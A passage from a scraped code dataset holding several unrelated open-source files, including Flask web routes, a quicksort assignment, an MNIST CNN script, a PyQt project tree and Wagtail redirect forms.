isFromFileNumber, \\\n target_path) # returns {\"flag\": True, \"tips\": \"没有从数据库中获取数据,可能行号过大\",\"path\":\"\"}\n\n if (resultExport[\"flag\"]):\n return send_from_directory(target_path, resultExport[\"path\"], as_attachment=True)\n else:\n return jsonify(resultExport)\n # return jsonify(result)\n # target_path = \"\"\n # return send_from_directory(target_path, \"2个完整-----测试.xlsx\", as_attachment=True)\n\n\n@company.route('/update', methods=['GET', 'POST'])\ndef updateCompany():\n start = request.args.get(\"s\", default=-1)\n # print(\"==================start==={}\".format(start))\n end = request.args.get(\"e\", default=-1)\n # print(\"==================end==={}\".format(end))\n start = int(start)\n end = int(end)\n filePath = request.args.get(\"f\", default=\"\")\n # print(\"==================filePath==={}\".format(filePath))\n if (filePath == \"\"):\n return {\"flag\": False, \"tips\": \"缺少文件名称选项\"}\n elif (filePath.find(\".\") == -1):\n filePath = filePath + \".xlsx\"\n sheetName = request.args.get(\"sheet\", default=\"\")\n if sheetName == \"\":\n sheetName = \"Sheet1\"\n isUseNewUser = 1\n result = update(filePath, sheetName, start, end, isUseNewUser) # returns {\"flag\": True, \"tips\": \"更新数据成功\",\"count\":\"\"}\n\n return jsonify(result)\n # return jsonify(result)\n\n\n@company.route('/testById', methods=['GET', 'POST'])\ndef testById():\n idargs = request.args.get(\"id\")\n idn = int(idargs)\n print(type(idargs))\n print(idn)\n cif = CompanyInfo.query.filter_by(id=idn).first()\n cis = CompanyInfoScheme(only=(\"companyName\", \"user.id\")) # only=(\"id\",) a single element must keep the trailing comma, because the argument has to be a tuple; without the comma it is just a string\n # exclude can likewise be used to hide chosen fields\n result = cis.dump(cif)\n return jsonify(result)\n\n\n# http://127.0.0.1:8088/p/testById?id=1004\n\n@company.route('/deleteCompany', methods=['GET', 'POST'])\ndef deleteCompany():\n a = request.get_data() # get the byte stream sent by JavaScript\n\n s1 = str(a, encoding='utf-8') # decode to string\n\n dict1 = json.loads(s1) # turn the string into a dict\n idn = int(dict1['id'])\n # print(type(idn))\n # print(idn)\n CompanyInfo.query.filter_by(id=idn).delete()\n db.session.commit()\n return jsonify({\"flag\": 1})\n\n\n@company.route('/showAll', methods=['GET', 'POST'])\ndef showAll():\n # dict = {}\n companyInfo = CompanyInfo.query.all()\n cis = CompanyInfoScheme(many=True)\n result = cis.dump(companyInfo)\n # print(result)\n # for i in companyInfo:\n # print(i.companyName)\n # dict[i.id] = json.dumps(obj=i.__dict__,ensure_ascii=False)\n return 
jsonify(result)","repo_name":"xiran2018/tfs","sub_path":"erp/company/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":16535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35957437009","text":"# Quicksort algorithm\n# Takes in a list and a pivot index and returns a partitioned list\ncomparisons = 0\n\ndef read_file(filename):\n with open(filename) as text_file:\n numbers = text_file.read().splitlines()\n num_array = []\n for number in numbers:\n number = int(number)\n num_array.append(number)\n text_file.close()\n return num_array\n\ndef quicksort(a, pivot_idx, median=False):\n # Base case\n if len(a) <= 1:\n return a\n else:\n # This rather ugly code block basically implements the median\n # functionality\n # Compares three elements: first, middle and last, and gets the median\n # element of the three\n if median is True:\n if (len(a) % 2 == 0):\n idx = len(a) / 2\n else:\n idx = (len(a) // 2) + 1\n idx = int(idx)\n mid_ele = a[idx]\n first_ele = a[0]\n last_ele = a[-1]\n temp_a = [first_ele, mid_ele, last_ele]\n temp_b = [0, idx, -1]\n temp_c = sorted(set(temp_a))\n pivot_idx = temp_b[temp_a.index(temp_c[1])]\n\n p = partition(a, pivot_idx);\n # p[0] is the sorted array; we update its state \n # p[1] is the pivot index; the element that was used as the pivot in\n # the partition function\n a = p[0]\n pivot = p[1]\n # Make recursive quicksort calls on two arrays, making sure not to\n # include the pivot element\n a[:pivot] = quicksort(a[:pivot], pivot_idx, median)\n a[pivot+1:] = quicksort(a[pivot+1:], pivot_idx, median)\n return a\n\ndef partition(a, pivot_idx):\n # Move the pivot to the first element\n temp = a[0]\n a[0] = a[pivot_idx]\n a[pivot_idx] = temp\n pivot_element = a[0]\n\n # Initialise the partition point at 1, to the right of the pivot\n partition_point = 1\n global comparisons\n comparisons+=max(len(a)-1, 0)\n #print(a, comparisons, max(len(a)-1,0))\n # Iterate over the list, swapping if necessary\n #print(a, pivot_idx)\n for seen_array in range(1,len(a)):\n if (a[seen_array] < pivot_element):\n # Swap positions of seen_array and partition_point element\n temp = a[partition_point]\n a[partition_point] = a[seen_array]\n a[seen_array] = temp\n # Increment partition_point\n partition_point+=1;\n else:\n pass\n # Swap the pivot element into the correct position\n #print(a, partition_point)\n temp = a[partition_point-1]\n a[partition_point-1] = pivot_element\n a[0] = temp\n #print('sorted:', a, partition_point-1, pivot_element)\n return (a, partition_point-1)\n \nprint(quicksort(read_file('QuickSort.txt')[:10], 0))\nprint('comparisons: {}, expected {}'.format(comparisons, 25))\ncomparisons=0\nprint(quicksort(read_file('QuickSort.txt')[:10], -1))\nprint('comparisons: {}, expected {}'.format(comparisons, 29))\ncomparisons=0\nprint(quicksort(read_file('QuickSort.txt')[:10], 1, True))\nprint('comparisons: {}, expected {}'.format(comparisons, 21))\ncomparisons=0\nquicksort(read_file('QuickSort.txt')[:100], 0)\nprint('comparisons: {}, expected {}'.format(comparisons, 615))\ncomparisons=0\nquicksort(read_file('QuickSort.txt')[:100], -1)\nprint('comparisons: {}, expected {}'.format(comparisons, 587))\ncomparisons=0\nquicksort(read_file('QuickSort.txt')[:100], 1, True)\nprint('comparisons: {}, expected {}'.format(comparisons, 518))\ncomparisons=0\n\n'''\n> python3 quicksort.py \n [504, 609, 2148, 3153, 5469, 6324, 7017, 7628, 7742, 9058]\n comparisons: 25, expected 25\n [504, 609, 2148, 3153, 5469, 
6324, 7017, 7628, 7742, 9058]\n comparisons: 31, expected 29\n [504, 609, 2148, 3153, 5469, 6324, 7017, 7628, 7742, 9058]\n comparisons: 24, expected 21\n comparisons: 620, expected 615\n comparisons: 573, expected 587\n comparisons: 540, expected 518\n'''\n","repo_name":"lieuzhenghong/algorithms-design-and-analysis","sub_path":"1/assignment3Quicksort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"24294132375","text":"from tensorflow.keras.datasets import mnist\r\nimport numpy as np\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Conv2D, Dense, Flatten, MaxPooling2D\r\nfrom tensorflow.keras.utils import plot_model\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom tensorflow.keras.utils import load_img, img_to_array\r\nfrom tensorflow import expand_dims\r\n#from PIL import Image\r\n\r\n(X_train, Y_train), (X_test, Y_test) = mnist.load_data()\r\nprint(X_train.shape)\r\nprint(Y_train.shape)\r\nprint(X_test.shape)\r\nprint(Y_test.shape)\r\n#%matplotlib inline\r\nsns.set(font_scale = 2)\r\nindex = np.random.choice(np.arange(len(X_train)), 24, replace = False)\r\nfigure, axes = plt.subplots(nrows=4, ncols=6, figsize=(16,9))\r\nfor item in zip(axes.ravel(), X_train[index], Y_train[index]):\r\n axes, pic, target = item\r\n axes.imshow(pic, cmap=plt.cm.gray_r)\r\n axes.set_xticks([])\r\n axes.set_yticks([])\r\n axes.set_title(target)\r\n plt.tight_layout()\r\nX_train = X_train.reshape((60000, 28, 28, 1))\r\nprint(X_train.shape)\r\nX_test = X_test.reshape((10000, 28, 28, 1))\r\nprint(X_test.shape)\r\nX_train = X_train.astype('float32')/255\r\nX_test = X_test.astype('float32')/255\r\nY_train = to_categorical(Y_train)\r\nY_train.shape\r\nprint(Y_train[0])\r\nY_test = to_categorical(Y_test)\r\nprint(Y_test.shape)\r\ncnn = Sequential()\r\ncnn.add(Conv2D(filters=64, kernel_size=(3,3), activation='relu', input_shape=(28,28,1)))\r\ncnn.add(MaxPooling2D(pool_size=(2,2)))\r\ncnn.add(Conv2D(filters=128, kernel_size=(3,3), activation='relu'))\r\ncnn.add(MaxPooling2D(pool_size=(2,2)))\r\ncnn.add(Flatten())\r\ncnn.add(Dense(units=128, activation='relu'))\r\ncnn.add(Dense(units=10, activation='softmax'))\r\nprint(cnn.summary())\r\ncnn.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\ncnn.fit(X_train, Y_train, epochs=5, batch_size=64, validation_split=0.1)\r\nloss, accuracy = cnn.evaluate(X_test, Y_test)\r\nprint(loss, ' ', accuracy)\r\nprzypuszczenia = cnn.predict(X_test)\r\nprint(Y_test[0])\r\nfor indeks, przypuszczenie in enumerate(przypuszczenia[0]):\r\n print(f'{indeks}: { przypuszczenie:.10%}')\r\nobrazy = X_test.reshape((10000, 28, 28))\r\nchybione_prognozy = []\r\nfor i, (p, e) in enumerate(zip(przypuszczenia, Y_test)):\r\n prognozowany, spodziewany = np.argmax(p), np.argmax(e)\r\n if prognozowany != spodziewany:\r\n chybione_prognozy.append(\r\n (i, obrazy[i], prognozowany, spodziewany))\r\nprint(len(chybione_prognozy))\r\nfigure, axes = plt.subplots(nrows=4, ncols=6, figsize=(16,12))\r\nfor axes, element in zip(axes.ravel(), chybione_prognozy):\r\n indeks, obraz, prognozowany, spodziewany = element\r\n axes.imshow(obraz, cmap=plt.cm.gray_r)\r\n axes.set_xticks([])\r\n axes.set_yticks([])\r\n axes.set_title(\r\n f'index: {indeks}\\np: {prognozowany}; s:{spodziewany}')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\nimages = 
['zero', 'one', 'two', 'three', 'four',\r\n 'five', 'six', 'seven', 'eight', 'nine']\r\nfor img in images:\r\n img2 = load_img(img + '.bmp', target_size=(28, 28), color_mode=\"grayscale\", interpolation=\"bilinear\")\r\n input_arr = img_to_array(img2)\r\n input_arr = expand_dims(input_arr, 0)\r\n input_arr /= 255.\r\n input_arr = 1. - input_arr\r\n digit = cnn.predict(input_arr)\r\n plt.imshow(input_arr[0], cmap=plt.cm.gray_r)\r\n plt.show()\r\n print(img)\r\n for indeks, result in enumerate(digit[0]):\r\n print(f'{indeks}: {result:.10%}')\r\n","repo_name":"DamianBisewski/MLsimpleexamples","sub_path":"Digitrecognition.py","file_name":"Digitrecognition.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16010210068","text":"import datetime\n\nbase_url = \"https://www.seismicportal.eu/fdsnws/event/1/query?limit=7000&start={}&end={}\"\n\nstart_date = datetime.datetime(1998, 7, 19)\nend_date = datetime.datetime(2023, 7, 19)\n\ncurrent_date = start_date\nlinks = []\n\ni=0\nwhile current_date <= end_date:\n start_time = current_date.strftime(\"%Y-%m-%dT%H:%M:%S.0\")\n end_time = (current_date + datetime.timedelta(days=1) - datetime.timedelta(seconds=1)).strftime(\"%Y-%m-%dT%H:%M:%S.0\")\n link = base_url.format(start_time, end_time)\n links.append(link)\n current_date += datetime.timedelta(days=1)\n i=i+1\n\nwith open(\"./logstash/seismic_portal_links.txt\", \"w\") as file:\n for link in links:\n file.write(link + \"\\n\")\n\n\n ","repo_name":"Daedalus9/QuakeMatch","sub_path":"logstash/urls_dates.py","file_name":"urls_dates.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"25297472732","text":"from flask import Flask, jsonify, render_template, request, url_for\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker \nimport os\nimport re\nimport datetime\nimport decimal\nfrom helpers import lookup\nimport json\n\n# creating flask object\napp = Flask(__name__)\n\n# configure sql_alchemy\nengine = create_engine(os.getenv('DATABASE_URL'))\ndb = scoped_session(sessionmaker(bind=engine))\n\n# JSON encoder for SQLAlchemy rows, passed as the default= hook to json.dumps\ndef alchemyencoder(obj):\n \"\"\"JSON encoder function for SQLAlchemy special classes.\"\"\"\n if isinstance(obj, datetime.date):\n return obj.isoformat()\n elif isinstance(obj, decimal.Decimal):\n return float(obj)\n\n# to ensure the responses aren't cached (stored)\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# route the default page\n@app.route('/')\ndef index():\n # to render map\n if not os.environ.get(\"API_KEY\"):\n raise RuntimeError(\"API_KEY not set\")\n return render_template(\"index.html\", key=os.environ.get(\"API_KEY\"))\n\n@app.route(\"/articles\")\ndef articles():\n \"\"\"Look up articles for geo\"\"\"\n query = request.args.get(\"geo\")\n\n # validate location\n if not query:\n raise RuntimeError(\"Location is not specified\")\n # to get parsed rss feeds\n articles = lookup(query)\n\n # get 5 articles\n if len(articles) > 5:\n #return jsonify(articles[:5])\n return json.dumps([dict(articles[r]) for r in range(5)],default=alchemyencoder)\n else:\n #return jsonify(articles)\n return json.dumps([dict(r) for r in articles],default=alchemyencoder)\n\n\n@app.route(\"/search\")\ndef search():\n 
\"\"\"Search for places that match query\"\"\"\n # Raise exception if no query arg is passed\n if not request.args.get('q'):\n raise RuntimeError(\"missing query\")\n # % is SQL's wildcard; appending it makes LIKE match anything that starts with q\n q = request.args.get(\"q\") + \"%\"\n places = db.execute(\"SELECT * FROM places WHERE postal_code LIKE :q OR place_name LIKE :q\", {'q': q}).fetchall()\n if len(places) > 10:\n #return jsonify(places[:10])\n return json.dumps([dict(places[r]) for r in range(10)],default=alchemyencoder)\n else:\n #return jsonify(places)\n return json.dumps([dict(r) for r in places],default=alchemyencoder)\n\n\n@app.route(\"/update\")\ndef update():\n \"\"\"Find up to 10 places within view\"\"\"\n # Ensure parameters are present\n if not request.args.get(\"sw\"):\n raise RuntimeError(\"missing sw\")\n if not request.args.get(\"ne\"):\n raise RuntimeError(\"missing ne\")\n\n # Ensure parameters are in lat,lng format\n if not re.search(\"^-?\\d+(?:\\.\\d+)?,-?\\d+(?:\\.\\d+)?$\", request.args.get(\"sw\")):\n raise RuntimeError(\"invalid sw\")\n if not re.search(\"^-?\\d+(?:\\.\\d+)?,-?\\d+(?:\\.\\d+)?$\", request.args.get(\"ne\")):\n raise RuntimeError(\"invalid ne\")\n\n # Explode southwest corner into two variables\n sw_lat, sw_lng = map(float, request.args.get(\"sw\").split(\",\"))\n\n # Explode northeast corner into two variables\n ne_lat, ne_lng = map(float, request.args.get(\"ne\").split(\",\"))\n\n # Find 10 cities within view, pseudorandomly chosen if more within view\n if sw_lng <= ne_lng:\n\n # Doesn't cross the antimeridian\n rows = db.execute(\"\"\"SELECT * FROM places\n WHERE :sw_lat <= latitude AND latitude <= :ne_lat AND (:sw_lng <= longitude AND longitude <= :ne_lng)\n GROUP BY country_code, place_name, admin_code1\n ORDER BY RANDOM()\n LIMIT 10\"\"\",\n {'sw_lat': sw_lat, 'ne_lat': ne_lat, 'sw_lng': sw_lng, 'ne_lng': ne_lng}).fetchall()\n\n else:\n\n # Crosses the antimeridian\n rows = db.execute(\"\"\"SELECT * FROM places\n WHERE :sw_lat <= latitude AND latitude <= :ne_lat AND (:sw_lng <= longitude OR longitude <= :ne_lng)\n GROUP BY country_code, place_name, admin_code1\n ORDER BY RANDOM()\n LIMIT 10\"\"\",\n {'sw_lat': sw_lat, 'ne_lat': ne_lat, 'sw_lng': sw_lng, 'ne_lng': ne_lng}).fetchall()\n\n # Output places as JSON\n #return jsonify(rows)\n return json.dumps([dict(r) for r in rows],default=alchemyencoder)\n","repo_name":"GeVic/Mapit","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70050890234","text":"#!/usr/bin/env python\nfrom peyotl import write_as_json\nimport codecs\nimport json\nimport time\nimport sys\n\n\ndef report_results(tag, duration, expected_fn, result):\n with codecs.open(expected_fn, 'rU', encoding='utf-8') as f:\n expected = json.load(f)\n succeeded = True\n if expected != result:\n obtained_fn = expected_fn + '-obtained.json'\n write_as_json(result, obtained_fn)\n succeeded = False\n return {'tag': tag,\n 'duration': duration,\n 'expected-output': succeeded,\n 'returned': True,\n 'status': 200\n }\n\n\ndef report_error(tag, duration, err):\n r = {'tag': tag,\n 'duration': duration,\n 'expected-output': False,\n 'returned': False,\n 'status': err.response.status_code,\n 'url': err.response.url,\n }\n if err.response.text:\n r['content'] = err.response.text\n return r\n\n\ndef _ot_call(tag, expected_fn, func, *valist, **kwargs):\n start_t = time.time()\n try:\n result = func(*valist, **kwargs)\n end_t = 
time.time()\n return report_results(tag, end_t - start_t, expected_fn, result)\n except HTTPError as x:\n end_t = time.time()\n return report_error(tag, end_t - start_t, x)\n\n\nif __name__ == '__main__':\n from peyotl.api import APIWrapper\n from requests import HTTPError\n import datetime\n\n timestamp = datetime.datetime.utcnow()\n\n otwrap = APIWrapper(phylesystem_api_kwargs={'get_from': 'api'})\n summary_list = []\n\n summary = _ot_call('treemachine/getSyntheticTree',\n 'curl-versions/getSyntheticTree.json',\n lambda: otwrap.treemachine.synthetic_tree,\n 'otol.draft.22',\n format='arguson',\n node_id=3534540,\n max_depth=3)\n summary_list.append(summary)\n\n summary = _ot_call('treemachine/getDraftTreeSubtreeForNodes',\n 'curl-versions/getDraftTreeSubtreeForNodes.json',\n otwrap.treemachine.get_synth_tree_pruned,\n ott_ids=[515698, 515712, 149491, 876340, 505091, 840022, 692350, 451182, 301424, 876348, 515698,\n 1045579, 267484, 128308, 380453, 678579, 883864, 863991, 3898562, 23821, 673540, 122251,\n 106729, 1084532, 541659]\n )\n summary_list.append(summary)\n\n summary = _ot_call('treemachine/getSynthesisSourceList',\n 'curl-versions/getSynthesisSourceList.json',\n lambda: otwrap.treemachine.synthetic_source_list,\n )\n summary_list.append(summary)\n\n summary = _ot_call('taxomachine/autocompleteBoxQuery',\n 'curl-versions/autocompleteBoxQuery.json',\n otwrap.taxomachine.autocomplete,\n 'Endoxyla',\n 'All life'\n )\n summary_list.append(summary)\n\n summary = _ot_call('phylesystem/study_list',\n 'curl-versions/study_list.json',\n lambda: otwrap.phylesystem_api.study_list,\n )\n summary_list.append(summary)\n\n summary = _ot_call('phylesystem/pg_719',\n 'curl-versions/pg_719.json',\n otwrap.phylesystem_api.get_study,\n 'pg_719')\n summary_list.append(summary)\n\n blob = {'time': timestamp.isoformat(),\n 'time_string': timestamp.strftime('%A %H:%M:%S.%f (UTC) %d %B, %Y'),\n 'summary': summary_list\n }\n out = codecs.getwriter('utf-8')(sys.stdout)\n write_as_json(blob, out, indent=1)\n","repo_name":"OpenTreeOfLife/peyotl","sub_path":"examples/ot-api/service-status-check.py","file_name":"service-status-check.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"963514894","text":"import os\nimport matplotlib.pyplot as plt\n\n\n# check how many images each folder holds\ndef read_flower_data(folder_name):\n folders = os.listdir(folder_name)\n flower_names = []\n flower_nums = []\n for folder in folders:\n folder_path = os.path.join(folder_name, folder)\n images = os.listdir(folder_path)\n images_num = len(images)\n print(\"{}:{}\".format(folder, images_num))\n flower_names.append(folder)\n flower_nums.append(images_num)\n\n return flower_names, flower_nums\n\n\n# draw a bar chart\ndef show_bar(x, y):\n # plot\n plt.barh(range(5), y, align='center', color='steelblue', alpha=0.8)\n # add the axis label\n plt.xlabel('num')\n # add the title\n plt.title('Num of flowers')\n # add the tick labels\n plt.yticks(range(5), x)\n # set the Y-axis tick range\n # plt.xlim([32, 47])\n # add a value label to each bar\n for x, y in enumerate(y):\n plt.text(y + 0.1, x, '%s' % y, va='center')\n # display the figure\n plt.show()\n\n\nif __name__ == '__main__':\n x, y = read_flower_data('../data/flower_photos')\n show_bar(x, y)","repo_name":"cmFighting/Flower_tf2.3","sub_path":"data_read.py","file_name":"data_read.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"95"} +{"seq_id":"72569345273","text":"#hash table with collisions\nhash_table = 
[\"\"] * 5\n\ndef hash_function(thing_to_be_hashed):\n #add up the ascii values of the string and mod length of table (takes care of overflow)\n print(sum([ord(char) for char in thing_to_be_hashed]))\n return sum([ord(char) for char in thing_to_be_hashed])%len(hash_table)\n\ndef insert(table,thing_to_be_hashed):\n hash_table[hash_function(thing_to_be_hashed)]=thing_to_be_hashed\n\ninsert(hash_table,\"Jon Snow\")\ninsert(hash_table,\"Andria\")\ninsert(hash_table,\"Adrian\")\nprint(hash_table)\n\n#hash table that uses chaining\n\nchained_hash_table= [[]for j in range(5)]\n\n#this time we add to a list at that index, so we don't overwrite\ndef chained_insert(table,thing_to_be_hashed):\n chained_hash_table[hash_function(thing_to_be_hashed)].append(thing_to_be_hashed)\n\nchained_insert(chained_hash_table,\"Adrian\")\nchained_insert(chained_hash_table,\"Andria\")\nchained_insert(chained_hash_table,\"Ardian\")\nprint(chained_hash_table)\n\n#this will tell you where to start looking, but still sucks\ndef get(table,thing_to_get):\n index = hash_function(thing_to_get)\n print(str(thing_to_get) + \" is located at index: \" +str(index))\n return index\nget(chained_hash_table,\"Adrian\")\nget(chained_hash_table,\"Andria\")\n\ndef get4real(table,thing_to_get):\n start = get(table,thing_to_get)\n i=0\n while table[start][i]!=thing_to_get:\n i+=1\n return (start,i)\nprint(get4real(chained_hash_table,\"Ardian\"))\n","repo_name":"YimRegister/YimmyTalks","sub_path":"hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"1290355274","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom ..assets import assets\nfrom .abstractions import Data\nimport os\nimport numpy as np\n\nclass ProjectTree(QtWidgets.QTreeWidget):\n\n opened_data = QtCore.pyqtSignal(Data)\n \n def __init__(self, *args):\n QtWidgets.QTreeWidget.__init__(self, args[0])\n args[2].addWidget(self, 0, 0, 6, 2)\n \n self.setObjectName(\"ProjectTreeWidget\")\n self.setHeaderLabel(\"Projects\")\n self.setStyleSheet( \"QTreeWidget{background: rgb(216,233,250);}\")\n self.startpath = args[1]\n self.search_projects()\n self.itemDoubleClicked.connect(self.open_item)\n\n def reset(self):\n iterator = QtWidgets.QTreeWidgetItemIterator(self, QtWidgets.QTreeWidgetItemIterator.All)\n while iterator.value():\n iterator.value().takeChildren()\n iterator +=1\n i = self.topLevelItemCount()\n while i > -1:\n self.takeTopLevelItem(i)\n i -= 1\n\n def open_item(self, item, col):\n \"\"\"\n Open an item in the tree\n :param item:\n :type item: QTreeWidgetItem\n \"\"\"\n path = self.get_abs_path(item)\n if self.is_project(path):\n if not item.isOpen():\n self.load_project(path, item)\n item.setOpen(True)\n elif os.path.isdir(path):\n if not item.isOpen():\n self.open_folder(path, item)\n item.setOpen(True)\n else:\n self.open_file(path)\n\n def open_file(self, path):\n \"\"\"\n Open a file with data, tagged or not\n :param path: Path to the file\n :type path: str:\n \"\"\"\n try:\n tagged = False\n tags = []\n with open(path, 'r') as f:\n tags = f.readline().split(' ')\n for tag in tags:\n try:\n complex(tag)\n except ValueError:\n #The string is not a number, so it must be a tag\n tagged = True\n break;\n\n #Remove end of line\n tags[-1] = tags[-1][:-1]\n \n skiprows = 0\n if tagged:\n skiprows = 1\n else:\n tags = []\n \n data = np.loadtxt(path, skiprows=skiprows)\n self.opened_data.emit(Data(data, tags))\n \n except Exception 
as err:\n raise ValueError(\"Could not read data from \" + path + \".\\n\", err)\n \n def open_folder(self, folder, tree):\n \"\"\"\n Opens a folder in the tree\n :param folder: Folder to open\n :type folder: str\n \"\"\"\n for element in os.listdir(folder):\n path_info = folder + \"/\" + element\n parent_itm = CustomTreeWidgetItem(tree, [element])\n if os.path.isdir(path_info):\n parent_itm.setIcon(0, QtGui.QIcon(':/images/folder.png'))\n self.open_folder(path_info, parent_itm)\n parent_itm.setExpanded(False)\n parent_itm.setOpen(True)\n else:\n parent_itm.setIcon(0, QtGui.QIcon(':/images/file.png'))\n \n \n def search_projects(self, startpath=None):\n \"\"\"\n Search for projects in the workspace\n and load them into the tree structure\n :param startpath: Set workspace to given path\n :type startpath: str\n :return: \n \"\"\"\n if startpath is not None:\n self.startpath = startpath\n for element in os.listdir(self.startpath):\n path_info = self.startpath + \"/\" + element\n if self.is_project(path_info):\n parent_itm = CustomTreeWidgetItem(self, [element])\n parent_itm.setIcon(0, QtGui.QIcon(':/images/proj.png'))\n \n \n def load_project(self, proj_path, tree):\n \"\"\"\n Load a single project into the tree\n :param tree: \n :return: \n \"\"\"\n # THIS MUST BE REIMPLEMENTED WHEN PROJECT DATA IS AVAILABLE\n self.open_folder(proj_path, tree)\n\n \n def is_project(self, path_info):\n # THIS MUST BE REIMPLEMENTED WHEN PROJECT DATA IS AVAILABLE\n # For the moment, just look for a .prj file\n return os.path.isdir(path_info) and len(list(filter(lambda x : '.prj' in x, os.listdir(path_info)))) == 1\n\n def get_abs_path(self, item):\n if item is None:\n return self.startpath\n else:\n return self.get_abs_path(item.parent()) + '/' + item.text(0)\n\n \nclass CustomTreeWidgetItem(QtWidgets.QTreeWidgetItem):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._isOpen = False\n \n def setOpen(self, isOpen):\n self._isOpen = isOpen\n\n def isOpen(self):\n return self._isOpen\n","repo_name":"Booligans/BMLF","sub_path":"src/main/python/ui/widgets/treewidget.py","file_name":"treewidget.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"26374115691","text":"from django import forms\nfrom django.core.signing import BadSignature, Signer\nfrom django.utils.translation import gettext_lazy as _\n\nfrom wagtail.admin.widgets import AdminPageChooser\nfrom wagtail.contrib.redirects.models import Redirect\nfrom wagtail.models import Site\n\n\nclass RedirectForm(forms.ModelForm):\n site = forms.ModelChoiceField(\n label=_(\"From site\"),\n queryset=Site.objects.all(),\n required=False,\n empty_label=_(\"All sites\"),\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields[\"redirect_page\"].widget = AdminPageChooser()\n\n required_css_class = \"required\"\n\n def clean(self):\n \"\"\"\n The unique_together condition on the model is ignored if site is None, so need to\n check for duplicates manually\n \"\"\"\n cleaned_data = super().clean()\n\n if cleaned_data.get(\"site\") is None:\n old_path = cleaned_data.get(\"old_path\")\n if old_path is None:\n # cleaned_data['old_path'] is empty because it has already failed validation,\n # so don't bother with our duplicate test\n return\n\n old_path = Redirect.normalise_path(old_path)\n duplicates = Redirect.objects.filter(old_path=old_path, site__isnull=True)\n if self.instance.pk:\n duplicates = 
duplicates.exclude(id=self.instance.pk)\n\n if duplicates:\n raise forms.ValidationError(\n _(\"A redirect with this path already exists.\")\n )\n\n class Meta:\n model = Redirect\n fields = (\"old_path\", \"site\", \"is_permanent\", \"redirect_page\", \"redirect_link\")\n\n\nclass ImportForm(forms.Form):\n import_file = forms.FileField(\n label=_(\"File to import\"),\n )\n\n def __init__(self, allowed_extensions, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n accept = \",\".join([f\".{x}\" for x in allowed_extensions])\n self.fields[\"import_file\"].widget = forms.FileInput(attrs={\"accept\": accept})\n\n uppercased_extensions = [x.upper() for x in allowed_extensions]\n allowed_extensions_text = \", \".join(uppercased_extensions)\n help_text = _(\"Supported formats: %(supported_formats)s.\") % {\n \"supported_formats\": allowed_extensions_text,\n }\n self.fields[\"import_file\"].help_text = help_text\n\n\nclass ConfirmImportManagementForm(forms.Form):\n \"\"\"\n Store the import file name and input format in the form so that it can be used in the next step\n\n The initial values are signed, to prevent them from being tampered with.\n \"\"\"\n\n import_file_name = forms.CharField(widget=forms.HiddenInput())\n input_format = forms.CharField(widget=forms.HiddenInput())\n\n def __init__(self, *args, **kwargs):\n self.signer = Signer()\n initial = kwargs.get(\"initial\", {})\n for key in {\"import_file_name\", \"input_format\"}:\n if key in initial:\n # Sign initial data so it cannot be tampered with\n initial[key] = self.signer.sign(initial[key])\n super().__init__(*args, **kwargs)\n\n def clean(self):\n cleaned_data = super().clean()\n for key in {\"import_file_name\", \"input_format\"}:\n try:\n cleaned_data[key] = self.signer.unsign(cleaned_data[key])\n except BadSignature as e:\n raise forms.ValidationError(e.message)\n return cleaned_data\n\n\nclass ConfirmImportForm(ConfirmImportManagementForm):\n from_index = forms.ChoiceField(\n label=_(\"From field\"),\n choices=(),\n )\n to_index = forms.ChoiceField(\n label=_(\"To field\"),\n choices=(),\n )\n site = forms.ModelChoiceField(\n label=_(\"From site\"),\n queryset=Site.objects.all(),\n required=False,\n empty_label=_(\"All sites\"),\n )\n permanent = forms.BooleanField(initial=True, required=False)\n\n def __init__(self, headers, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n choices = []\n for i, f in enumerate(headers):\n choices.append([str(i), f])\n if len(headers) > 1:\n choices.insert(0, (\"\", \"---\"))\n\n self.fields[\"from_index\"].choices = choices\n self.fields[\"to_index\"].choices = choices\n","repo_name":"wagtail/wagtail","sub_path":"wagtail/contrib/redirects/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":16307,"dataset":"github-code","pt":"95"} +{"seq_id":"74370213433","text":"import numpy as np\r\nimport os, cv2, time, copy\r\nimport torch\r\nimport gym\r\nfrom Networks.network import pytorch_model\r\nfrom Networks.distributions import Bernoulli, Categorical, DiagGaussian\r\nfrom EnvironmentModels.environment_model import FeatureSelector, 